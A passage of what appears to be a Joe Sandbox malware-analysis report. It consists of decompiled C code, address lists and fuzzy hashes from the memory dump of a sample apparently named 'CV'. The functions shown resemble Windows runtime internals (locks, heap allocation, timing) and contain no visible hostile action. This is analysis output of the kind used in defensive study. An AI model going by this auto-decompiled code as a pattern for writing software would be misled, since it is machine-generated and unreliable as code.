								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x01272ae4
0x01272aec
0x01272aef
0x01272af4
0x01272af7
0x01272afd
0x01272b92
0x01272b92
0x01272b97
0x01272b9c
0x01272b9c
0x01272b03
0x01272b06
0x01272b09
0x01272b09
0x01272b0f
0x01272b15
0x01272b15
0x01272b1b
0x01272b1e
0x01272b21
0x01272b26
0x01272b29
0x01272b81
0x01272b84
0x01272c0e
0x01272c15
0x01272c24
0x01272c24
0x01272b8a
0x01272b8a
0x01272b8a
0x01272b8a
0x01272b90
0x00000000
0x00000000
0x00000000
0x00000000
0x01272b4a
0x01272b4a
0x01272b4d
0x01272b53
0x00000000
0x00000000
0x01272b55
0x01272b58
0x01272bb7
0x012b5d1b
0x012b5d37
0x012b5d47
0x012b5d53
0x01272bbd
0x01272bbd
0x01272bbd
0x01272bb7
0x01272b5d
0x01272c2f
0x012b5d5b
0x012b5d77
0x012b5d87
0x012b5d93
0x01272c35
0x01272c35
0x01272c35
0x01272c2f
0x01272b65
0x01272b9f
0x01272ba2
0x01272b67
0x01272b67
0x01272b69
0x01272b6b
0x01272b6e
0x01272bc9
0x01272bcc
0x01272bcf
0x01272bd4
0x01272bd6
0x01272bd6
0x01272bdb
0x01272c02
0x01272c05
0x01272c07
0x00000000
0x01272c07
0x01272be0
0x01272c00
0x01272c3f
0x01272c3f
0x00000000
0x01272c00
0x01272be5
0x01272be7
0x01272bec
0x01272bf4
0x01272bf6
0x00000000
0x01272bf6
0x01272b70
0x01272b76
0x01272b2b
0x01272b2b
0x01272b2d
0x01272b2f
0x01272b32
0x01272b35
0x01272b3a
0x00000000
0x01272b40
0x01272b43
0x01272b45
0x01272b47
0x01272b4a
0x01272b4d
0x01272b53
0x00000000
0x00000000
0x00000000
0x01272b53
0x01272b78
0x01272b78
0x01272b7b
0x01272b7e
0x00000000
0x01272b7e
0x01272b76
0x01272ba5
0x01272ba5
0x01272ba8
0x01272bad
0x00000000
0x00000000
0x01272baf
0x01272baf
0x01272bc2
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0019b4da83197c47d6bd203f80a20c5390031e5ed512f231f71ea14d59423a43
Instruction ID: 5bcb35114e3ed10245c15bf67569c1fc820b27c7cd17029071402453b7aecef7
Opcode Fuzzy Hash: 0019b4da83197c47d6bd203f80a20c5390031e5ed512f231f71ea14d59423a43
Instruction Fuzzy Hash: 8E510676B20116CFCB14CF1CC891ABEB7F5FB98700B06855AE946EB355E730AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0130AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0130AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0130C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0130ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0130FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0130EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E01267D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01301608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01311536(0x1338ae4, (_t74 -  *0x1338b04 >> 0x14) + (_t74 -  *0x1338b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0130C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0130A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E012ECB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0130ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0130ae44
0x0130ae4c
0x0130ae53
0x0130ae55
0x0130ae5c
0x0130ae64
0x0130ae68
0x0130ae75
0x0130ae75
0x0130ae78
0x0130ae7a
0x0130ae7c
0x0130ae7f
0x0130aea8
0x0130aeab
0x0130aead
0x00000000
0x00000000
0x0130aeb3
0x0130aeb8
0x0130aebb
0x0130aebd
0x00000000
0x0130ae81
0x0130ae88
0x0130ae8f
0x0130ae9b
0x0130ae96
0x0130ae96
0x0130ae96
0x0130aea0
0x0130aea3
0x0130aebf
0x0130aebf
0x0130aec3
0x0130aec9
0x0130af0d
0x0130af14
0x0130af3d
0x0130af3d
0x0130af41
0x0130af44
0x0130af67
0x0130af67
0x0130af6a
0x0130afca
0x0130afd1
0x00000000
0x0130afd1
0x0130af6c
0x0130af6d
0x0130af75
0x0130af7c
0x0130af7e
0x0130af80
0x0130af85
0x0130af87
0x0130af99
0x0130af89
0x0130af92
0x0130af92
0x0130af9e
0x0130afa1
0x0130afa3
0x0130afa9
0x0130afb0
0x0130afb2
0x0130afb4
0x0130afbc
0x0130afbc
0x0130afb4
0x0130afb0
0x00000000
0x0130afa1
0x0130af4f
0x0130af57
0x0130af5c
0x0130af5e
0x00000000
0x00000000
0x0130af60
0x0130af64
0x0130af64
0x00000000
0x0130af64
0x0130af1a
0x0130af25
0x00000000
0x00000000
0x0130af27
0x0130af28
0x0130af33
0x00000000
0x0130aed0
0x0130aed0
0x0130aed2
0x0130aee1
0x0130aee4
0x00000000
0x00000000
0x0130aee6
0x0130aeec
0x00000000
0x00000000
0x0130aefb
0x0130af07
0x0130afd3
0x0130afdb
0x0130afdb
0x00000000
0x0130af07
0x0130aed6
0x0130aed8
0x0130aedf
0x00000000
0x00000000
0x00000000
0x0130aedf
0x0130aec9

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cb24b3f3b45950308dcdb5feffa9bd2a7f0baf2b9b125f622f982b163162ee0
Instruction ID: ae88305ffb0eae4709af702490648dd96647a691469a9577c7fcb7159f3da9be
Opcode Fuzzy Hash: 6cb24b3f3b45950308dcdb5feffa9bd2a7f0baf2b9b125f622f982b163162ee0
Instruction Fuzzy Hash: 2741E5B17043119BE727DA2DECA4B3BBBDAAF94628F04421DF95A8B2D0D734D805C691

Uniqueness

Uniqueness Score: -1.00%

Function 0126DBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0126DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0124CC50(E01244510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01267D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01318ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01262280(_t58, _v44);
						E0126DD82(_v44, _t102, _t98);
						E0126B944(_t102, _v5);
						return E0125FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1338628; // 0x0
							_v28 = _t67;
							_t68 =  *0x133862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1338628; // 0x0
						_t105 = _v28;
						_t80 =  *0x133862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x130fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0126dbe9
0x0126dbf2
0x0126dbf7
0x0126dbf9
0x0126dbfc
0x0126dc00
0x0126dc03
0x0126dc14
0x0126dd54
0x0126dd54
0x0126dd54
0x0126dc18
0x0126dc1d
0x0126dc1d
0x0126dc32
0x0126dc3b
0x0126dc3e
0x0126dc46
0x0126dd5b
0x0126dd62
0x0126dd64
0x0126dd67
0x0126dd69
0x0126dd6b
0x0126dd6e
0x0126dd70
0x0126dd73
0x0126dd73
0x00000000
0x0126dc4c
0x0126dc4e
0x012b3ae3
0x012b3ae8
0x012b3aea
0x0126dce7
0x0126dce9
0x0126dcec
0x0126dcee
0x0126dcf0
0x0126dcf3
0x0126dcf5
0x012b3af2
0x012b3af5
0x012b3af5
0x0126dd06
0x0126dd08
0x0126dd0b
0x0126dd12
0x012b3b08
0x0126dd18
0x0126dd18
0x0126dd18
0x0126dd20
0x0126dd23
0x012b3b16
0x012b3b16
0x0126dd29
0x0126dd2d
0x0126dd36
0x0126dd40
0x0126dd51
0x0126dd51
0x0126dc54
0x0126dc59
0x0126dc59
0x0126dc5e
0x0126dc5e
0x0126dc63
0x0126dc66
0x0126dc6b
0x0126dc78
0x0126dc7b
0x0126dc81
0x0126dc81
0x0126dc83
0x0126dc89
0x00000000
0x00000000
0x0126dd7b
0x0126dd7b
0x0126dc8f
0x0126dc8f
0x0126dc92
0x0126dc99
0x0126dc9f
0x0126dca5
0x0126dcaa
0x0126dcaa
0x0126dcb3
0x0126dcb8
0x0126dcbb
0x0126dcc1
0x0126dccf
0x0126dcd2
0x0126dcd5
0x0126dcd7
0x0126dcda
0x0126dcdc
0x0126dcdc
0x0126dce2
0x0126dce4
0x00000000
0x0126dce4

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e4a765044eacc289ae52d8184cc16b6b72131ed896da0cfcd5754a6fa6c63e
Instruction ID: da53aceef27fa0615b338b23c8d491403dc453c2fc9cddfcfc5e193dbeca05b2
Opcode Fuzzy Hash: f1e4a765044eacc289ae52d8184cc16b6b72131ed896da0cfcd5754a6fa6c63e
Instruction Fuzzy Hash: 90519172B1161ECFCB14DFA8C4806AEBBF9BB58350F208159D695E7384DB70A984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0125EF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0125EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01249080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7788c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01242D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0125ef4b
0x0125ef4d
0x0125ef57
0x0125f0bd
0x0125f0c2
0x0125f0d2
0x0125f0d2
0x0125f0c2
0x0125ef5d
0x0125ef5f
0x0125ef67
0x0125ef6a
0x0125ef6d
0x0125ef74
0x0125ef7f
0x0125ef82
0x0125ef82
0x0125ef86
0x0125ef88
0x0125ef8c
0x0125ef8f
0x0125ef8f
0x0125ef8f
0x00000000
0x0125ef91
0x0125ef93
0x0125efc4
0x0125efc4
0x0125efc4
0x0125efca
0x0125efd0
0x0125f0a6
0x00000000
0x00000000
0x0125f0af
0x012abb06
0x012abb0a
0x0125f0b5
0x0125f0b5
0x0125f0b5
0x0125f0b5
0x00000000
0x0125efd6
0x0125efd9
0x0125f0de
0x0125f0e2
0x0125efdf
0x0125efdf
0x0125efdf
0x0125efe5
0x012abafc
0x012abafc
0x0125efe5
0x0125efeb
0x0125efed
0x0125f00f
0x0125f011
0x0125f01a
0x0125f01d
0x0125f021
0x0125f028
0x0125f029
0x0125f029
0x0125f02c
0x00000000
0x0125f02c
0x0125eff3
0x0125eff9
0x0125f0ea
0x0125f0ed
0x0125f0ef
0x00000000
0x0125f0ef
0x0125f003
0x012abb12
0x0125f045
0x0125f049
0x0125f051
0x0125f09e
0x0125f0a0
0x0125f0a0
0x0125f09e
0x0125f053
0x0125f064
0x0125f064
0x0125f06b
0x012abb1a
0x012abb1a
0x0125f071
0x0125f071
0x0125f07d
0x0125f082
0x0125f08f
0x0125f08f
0x0125f009
0x0125f00d
0x00000000
0x0125f00d
0x0125efd0
0x0125ef97
0x0125efa5
0x0125efaa
0x00000000
0x0125efac
0x0125efac
0x0125efac
0x00000000
0x0125efb2
0x0125f036
0x0125f03a
0x0125f040
0x0125f090
0x00000000
0x0125f092
0x0125f042
0x00000000
0x0125f042
0x0125efb7
0x0125efb9
0x0125efbc
0x0125efb0
0x0125efb0
0x00000000
0x0125efbe
0x0125efbe
0x0125efc1
0x00000000
0x0125efc1
0x0125efbc
0x0125efaa
0x0125ef91

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: ebbbff2999ef004d812730003b85af7ca98d2df9ea33f4dd7f7c736a14700ae1
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 22513830E24246DFEB65CB6CC2C17EEFBB1AF05314F1881A8DE4553282D7B5AA89C741

Uniqueness

Uniqueness Score: -1.00%

Function 0131740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0131740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0129D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0128F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01264620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01264620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0128F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01264620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0131740d
0x0131740d
0x01317412
0x01317413
0x01317416
0x01317418
0x0131741c
0x0131741f
0x01317422
0x01317422
0x01317428
0x0131742a
0x0131742a
0x01317451
0x01317432
0x0131744f
0x0131744f
0x00000000
0x01317434
0x01317438
0x01317443
0x01317517
0x01317517
0x0131751a
0x01317535
0x01317520
0x01317527
0x0131752c
0x01317531
0x01317533
0x00000000
0x01317533
0x00000000
0x01317531
0x0131754b
0x0131754f
0x0131755c
0x0131755c
0x0131755f
0x01317560
0x01317561
0x01317562
0x01317563
0x01317568
0x0131756a
0x0131756c
0x0131756d
0x0131756d
0x0131756f
0x01317572
0x01317574
0x01317577
0x0131757c
0x0131757f
0x00000000
0x01317551
0x01317551
0x01317551
0x01317553
0x01317553
0x01317449
0x01317449
0x0131744c
0x0131744c
0x00000000
0x0131744c
0x01317443
0x0131750e
0x01317514
0x01317514
0x01317455
0x01317469
0x0131746d
0x00000000
0x01317473
0x01317473
0x01317476
0x01317480
0x01317484
0x0131748e
0x01317493
0x01317493
0x01317496
0x01317499
0x013174a1
0x013174b1
0x013174b5
0x00000000
0x013174bb
0x013174c1
0x013174c1
0x013174c4
0x013174c5
0x013174c6
0x013174c7
0x013174c8
0x013174cd
0x00000000
0x013174d3
0x013174d3
0x013174d6
0x013174d8
0x013174db
0x013174dd
0x013174e0
0x013174e7
0x013174ee
0x013174ee
0x013174f4
0x013174f9
0x00000000
0x013174fb
0x013174fb
0x013174fd
0x01317500
0x01317503
0x01317505
0x01317505
0x013174f9
0x00000000
0x013174cd
0x013174b5
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: fd1fce869981405d790c26ca0c0572aff5a329737d16f035c40eeccf5bd98db5
